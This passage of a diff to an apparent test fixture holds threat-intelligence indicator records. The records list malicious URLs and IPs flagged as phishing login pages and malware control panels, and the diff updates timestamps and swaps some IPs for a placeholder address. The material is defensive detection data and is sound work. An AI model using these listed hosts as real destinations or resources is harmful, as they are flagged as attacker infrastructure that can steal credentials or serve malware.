CyberCrime\",\"id\":\"indicator--f69535bc-4059-445d-90b0-1df8498137a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:17.615Z\",\"name\":\"mal_url: http://2maga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2maga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.615Z\"}", "category": "threat", "type": "indicator", @@ -8233,7 +8233,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385825273Z", + "ingested": "2021-12-13T08:38:40.023503900Z", "original": "{\"created\":\"2020-01-27T02:56:17.653Z\",\"description\":\"TS ID: 55259870704; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a372cefa-0694-4e39-aa50-67be2cded923\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-27T02:56:17.653Z\",\"name\":\"mal_url: http://mogutse.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogutse.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:17.653Z\"}", "category": "threat", "type": "indicator", @@ -8284,7 +8284,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385829391Z", + "ingested": "2021-12-13T08:38:40.023507500Z", "original": "{\"created\":\"2020-01-27T02:56:22.845Z\",\"description\":\"TS ID: 55259870661; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--ff74ddcd-b63b-4c1d-b4e0-8703b74564ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:22.845Z\",\"name\":\"mal_url: http://turamesplus.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesplus.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:22.845Z\"}", "category": "threat", "type": "indicator", @@ -8335,7 +8335,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385834100Z", + "ingested": "2021-12-13T08:38:40.023511200Z", "original": "{\"created\":\"2020-01-27T02:56:23.51Z\",\"description\":\"TS ID: 55259870713; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--360f60db-e8ca-4ede-9f65-7dcb01425d2e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.51Z\",\"name\":\"mal_url: http://merops.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merops.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.51Z\"}", "category": "threat", "type": "indicator", @@ -8386,7 +8386,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385838438Z", + "ingested": "2021-12-13T08:38:40.023514900Z", "original": "{\"created\":\"2020-01-27T02:56:23.555Z\",\"description\":\"TS ID: 55259870702; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--bafd8878-321e-4501-ae0f-221772acccae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:23.555Z\",\"name\":\"mal_url: http://mogut.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mogut.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:23.555Z\"}", "category": "threat", "type": "indicator", @@ -8437,7 +8437,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385843087Z", + "ingested": "2021-12-13T08:38:40.023520300Z", "original": "{\"created\":\"2020-01-27T02:56:32.951Z\",\"description\":\"TS ID: 55259870813; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--21811787-57db-4ca6-abb9-57d33500a88e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:32.951Z\",\"name\":\"mal_url: http://2magas.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://2magas.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:32.951Z\"}", "category": "threat", "type": "indicator", @@ -8488,7 +8488,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385847615Z", + "ingested": "2021-12-13T08:38:40.023527800Z", "original": "{\"created\":\"2020-01-27T02:56:37.65Z\",\"description\":\"TS ID: 55259870741; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--80641a7e-afbf-4b8d-96e6-4770491297b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-27T02:56:37.65Z\",\"name\":\"mal_url: http://merakim.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://merakim.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.65Z\"}", "category": "threat", "type": "indicator", @@ -8539,7 +8539,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385851953Z", + "ingested": "2021-12-13T08:38:40.023531700Z", "original": "{\"created\":\"2020-01-27T02:56:37.697Z\",\"description\":\"TS ID: 55259870659; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--fb351f4a-90ab-4ff4-a482-b38e7f92bb77\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:37.697Z\",\"name\":\"mal_url: http://turamesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://turamesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:37.697Z\"}", "category": "threat", "type": "indicator", @@ -8590,7 +8590,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385856231Z", + "ingested": "2021-12-13T08:38:40.023537800Z", "original": "{\"created\":\"2020-01-27T02:56:41.827Z\",\"description\":\"TS ID: 55259870687; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--a5ade447-681b-4518-8ea5-779d9de3ff0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:41.827Z\",\"name\":\"mal_url: http://ramesv.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesv.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.827Z\"}", "category": "threat", "type": "indicator", @@ -8641,7 +8641,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385860469Z", + "ingested": "2021-12-13T08:38:40.023543600Z", "original": "{\"created\":\"2020-01-27T02:56:41.874Z\",\"description\":\"TS ID: 55259870674; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--9a797de6-1aa1-4f5c-b40a-c65699117f57\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-01-27T02:56:41.874Z\",\"name\":\"mal_url: http://roninrol.info/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://roninrol.info/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:41.874Z\"}", "category": "threat", "type": "indicator", @@ -8692,7 +8692,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385864878Z", + "ingested": "2021-12-13T08:38:40.023547800Z", "original": "{\"created\":\"2020-01-27T02:56:49.344Z\",\"description\":\"TS ID: 55259870678; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--7a094f4c-d57d-4bad-9258-a19210782331\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:49.344Z\",\"name\":\"mal_url: http://ramesvet8.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ramesvet8.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:49.344Z\"}", "category": "threat", "type": "indicator", @@ -8743,7 +8743,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385869026Z", + "ingested": "2021-12-13T08:38:40.023552200Z", "original": "{\"created\":\"2020-01-27T02:56:53.905Z\",\"description\":\"TS ID: 55259870709; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--6de4e500-4c56-4288-aa8f-b092f194ff78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:56:53.905Z\",\"name\":\"mal_url: http://meropsi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropsi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:56:53.905Z\"}", "category": "threat", "type": "indicator", @@ -8762,7 +8762,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.90.192.161", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime", "modified": "2020-01-27T02:57:06.376Z", "valid_from": "2020-01-27T02:57:06.376Z", @@ -8784,12 +8784,12 @@ "first_seen": "2020-01-27T02:57:06.376Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.90.192.161" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385873243Z", - "original": "{\"created\":\"2020-01-27T02:57:06.376Z\",\"description\":\"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:06.376Z\",\"name\":\"mal_ip: 91.90.192.161\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.90.192.161']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:06.376Z\"}", + "ingested": "2021-12-13T08:38:40.023558100Z", + "original": "{\"created\":\"2020-01-27T02:57:06.376Z\",\"description\":\"TS ID: 55259870660; iType: mal_ip; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--c4c00824-3ceb-4b3c-89a2-77d3920aacdb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:06.376Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:06.376Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -8839,7 +8839,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385877531Z", + "ingested": "2021-12-13T08:38:40.023562200Z", "original": "{\"created\":\"2020-01-27T02:57:09.474Z\",\"description\":\"TS ID: 55259870721; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--0e9df710-3a24-4070-9576-f3081708cd67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:09.474Z\",\"name\":\"mal_url: http://meropa.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropa.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:09.474Z\"}", "category": "threat", "type": "indicator", @@ -8890,7 +8890,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385882110Z", + "ingested": "2021-12-13T08:38:40.023567300Z", "original": "{\"created\":\"2020-01-27T02:57:12.314Z\",\"description\":\"TS ID: 55259870801; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--4d6b9fe5-43f3-42af-b7c0-171052280208\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:12.314Z\",\"name\":\"mal_url: http://5umaga.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5umaga.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.314Z\"}", "category": "threat", "type": "indicator", @@ -8941,7 +8941,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385886488Z", + "ingested": "2021-12-13T08:38:40.023574900Z", "original": "{\"created\":\"2020-01-27T02:57:12.344Z\",\"description\":\"TS ID: 55259870773; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--50a15dd9-290b-4240-9245-bbe259bcc4c7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-27T02:57:12.344Z\",\"name\":\"mal_url: http://dufre1.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre1.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:12.344Z\"}", "category": "threat", "type": "indicator", @@ -8992,7 +8992,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385890877Z", + "ingested": "2021-12-13T08:38:40.023585Z", "original": "{\"created\":\"2020-01-27T02:57:17.92Z\",\"description\":\"TS ID: 55259870746; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--53b80678-1eeb-433c-bd54-fd1ae9c83c18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-27T02:57:17.92Z\",\"name\":\"mal_url: http://dufre-tom.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dufre-tom.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:17.92Z\"}", "category": "threat", "type": "indicator", @@ -9043,7 +9043,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385895335Z", + "ingested": "2021-12-13T08:38:40.023592900Z", "original": "{\"created\":\"2020-01-27T02:57:19.085Z\",\"description\":\"TS ID: 55259870735; iType: mal_url; State: active; Org: Friendhosting LTD; Source: CyberCrime\",\"id\":\"indicator--b14f43dd-6653-42d4-b0db-3cf4e7fbee87\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-27T02:57:19.085Z\",\"name\":\"mal_url: http://meropi.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://meropi.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-27T02:57:19.085Z\"}", "category": "threat", "type": "indicator", @@ -9095,7 +9095,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385899643Z", + "ingested": "2021-12-13T08:38:40.023596600Z", "original": "{\"created\":\"2020-01-28T02:58:19.372Z\",\"description\":\"TS ID: 55263242048; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--e2cdc754-bf45-4c4e-a98a-0fcc1a62cc63\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-28T02:58:19.372Z\",\"name\":\"mal_url: http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://serv-node4.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.372Z\"}", "category": "threat", "type": "indicator", @@ -9147,7 +9147,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385904071Z", + "ingested": "2021-12-13T08:38:40.023600300Z", "original": "{\"created\":\"2020-01-28T02:58:19.396Z\",\"description\":\"TS ID: 55263242003; iType: mal_url; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime\",\"id\":\"indicator--f0aa41c1-9c01-420f-9134-20fa6a00f8e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-28T02:58:19.396Z\",\"name\":\"mal_url: http://usarmyvacations.info/ssd/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://usarmyvacations.info/ssd/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:19.396Z\"}", "category": "threat", "type": "indicator", @@ -9198,7 +9198,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385908500Z", + "ingested": "2021-12-13T08:38:40.023605600Z", "original": "{\"created\":\"2020-01-28T02:58:26.492Z\",\"description\":\"TS ID: 55263242014; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--15b60240-37eb-41c9-9e66-872f19406f6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-28T02:58:26.492Z\",\"name\":\"mal_url: http://la6e51ed.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://la6e51ed.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.492Z\"}", "category": "threat", "type": "indicator", @@ -9250,7 +9250,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385913018Z", + "ingested": "2021-12-13T08:38:40.023613300Z", "original": "{\"created\":\"2020-01-28T02:58:26.52Z\",\"description\":\"TS ID: 55263241842; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--6a3a7dfd-7dd0-4b5b-b614-b09f20ae34f3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-49\"],\"modified\":\"2020-01-28T02:58:26.52Z\",\"name\":\"mal_url: http://209.250.247.253/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://209.250.247.253/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:26.52Z\"}", "category": "threat", "type": "indicator", @@ -9302,7 +9302,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385917316Z", + "ingested": "2021-12-13T08:38:40.023650400Z", "original": "{\"created\":\"2020-01-28T02:58:43.041Z\",\"description\":\"TS ID: 55263242045; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--d2de10c5-aaee-4c32-ac0c-0d17ea9c7caf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-28T02:58:43.041Z\",\"name\":\"mal_url: http://footlooking.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://footlooking.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.041Z\"}", "category": "threat", "type": "indicator", @@ -9321,7 +9321,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 2.57.184.184", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-01-28T02:58:43.095Z", "valid_from": "2020-01-28T02:58:43.095Z", @@ -9343,12 +9343,12 @@ "first_seen": "2020-01-28T02:58:43.095Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "2.57.184.184" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385921654Z", - "original": "{\"created\":\"2020-01-28T02:58:43.095Z\",\"description\":\"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8391ee32-499a-4390-b81d-5bd14638be82\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T02:58:43.095Z\",\"name\":\"mal_ip: 2.57.184.184\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '2.57.184.184']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.095Z\"}", + "ingested": "2021-12-13T08:38:40.023654900Z", + "original": "{\"created\":\"2020-01-28T02:58:43.095Z\",\"description\":\"TS ID: 55263242017; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8391ee32-499a-4390-b81d-5bd14638be82\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-01-28T02:58:43.095Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:43.095Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9398,7 +9398,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385925932Z", + "ingested": "2021-12-13T08:38:40.023660600Z", "original": "{\"created\":\"2020-01-28T02:58:45.172Z\",\"description\":\"TS ID: 55263242019; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1a91efe1-ff09-49b2-801b-fb815c843976\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-01-28T02:58:45.172Z\",\"name\":\"mal_url: http://a0377875.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0377875.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:45.172Z\"}", "category": "threat", "type": "indicator", @@ -9450,7 +9450,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385930301Z", + "ingested": "2021-12-13T08:38:40.023664700Z", "original": "{\"created\":\"2020-01-28T02:58:46.345Z\",\"description\":\"TS ID: 55263241963; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9980de5d-7c0e-456a-b2bf-32544fda592b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:46.345Z\",\"name\":\"mal_url: http://samaaj.org.pk/ofo/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/ofo/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:46.345Z\"}", "category": "threat", "type": "indicator", @@ -9501,7 +9501,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385934669Z", + "ingested": "2021-12-13T08:38:40.023668800Z", "original": "{\"created\":\"2020-01-28T02:58:54.765Z\",\"description\":\"TS ID: 55263242018; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5da6cfdf-c2a5-45d5-857e-110fc26336f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-28T02:58:54.765Z\",\"name\":\"mal_url: http://f0390226.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0390226.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:54.765Z\"}", "category": "threat", "type": "indicator", @@ -9553,7 +9553,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385938997Z", + "ingested": "2021-12-13T08:38:40.023673200Z", "original": "{\"created\":\"2020-01-28T02:58:57.481Z\",\"description\":\"TS ID: 55263242026; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--5a32ccb0-c749-4286-a606-f3bfe9a61084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-28T02:58:57.481Z\",\"name\":\"mal_url: http://samaaj.org.pk/justices/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://samaaj.org.pk/justices/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:58:57.481Z\"}", "category": "threat", "type": "indicator", @@ -9572,7 +9572,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.3/teejay/logs/omc.php", + "name": "mal_url: http://89.160.20.156/teejay/logs/omc.php", "description": "TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-28T02:59:19.105Z", "valid_from": "2020-01-28T02:59:19.105Z", @@ -9597,16 +9597,16 @@ "url": { "path": "/teejay/logs/omc.php", "extension": "php", - "original": "http://193.142.59.3/teejay/logs/omc.php", + "original": "http://89.160.20.156/teejay/logs/omc.php", "scheme": "http", - "domain": "193.142.59.3", - "full": "http://193.142.59.3/teejay/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/teejay/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385943535Z", - "original": "{\"created\":\"2020-01-28T02:59:19.105Z\",\"description\":\"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-01-28T02:59:19.105Z\",\"name\":\"mal_url: http://193.142.59.3/teejay/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.3/teejay/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:19.105Z\"}", + "ingested": "2021-12-13T08:38:40.023676700Z", + "original": "{\"created\":\"2020-01-28T02:59:19.105Z\",\"description\":\"TS ID: 55263242012; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c26773dc-80be-48c8-98fd-409174bfd0e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-01-28T02:59:19.105Z\",\"name\":\"mal_url: http://89.160.20.156/teejay/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/teejay/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-28T02:59:19.105Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -9624,7 +9624,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 88.119.160.89", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: CyberCrime", "modified": "2020-01-28T02:59:23.530Z", "valid_from": "2020-01-28T02:59:23.53Z", @@ -9646,12 +9646,12 @@ "first_seen": "2020-01-28T02:59:23.530Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "88.119.160.89" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385947773Z", - "original": "{\"created\":\"2020-01-28T02:59:23.53Z\",\"description\":\"TS ID: 55263242004; iType: mal_ip; State: active; Org: Informacines sistemos ir technologijos, UAB; Source: 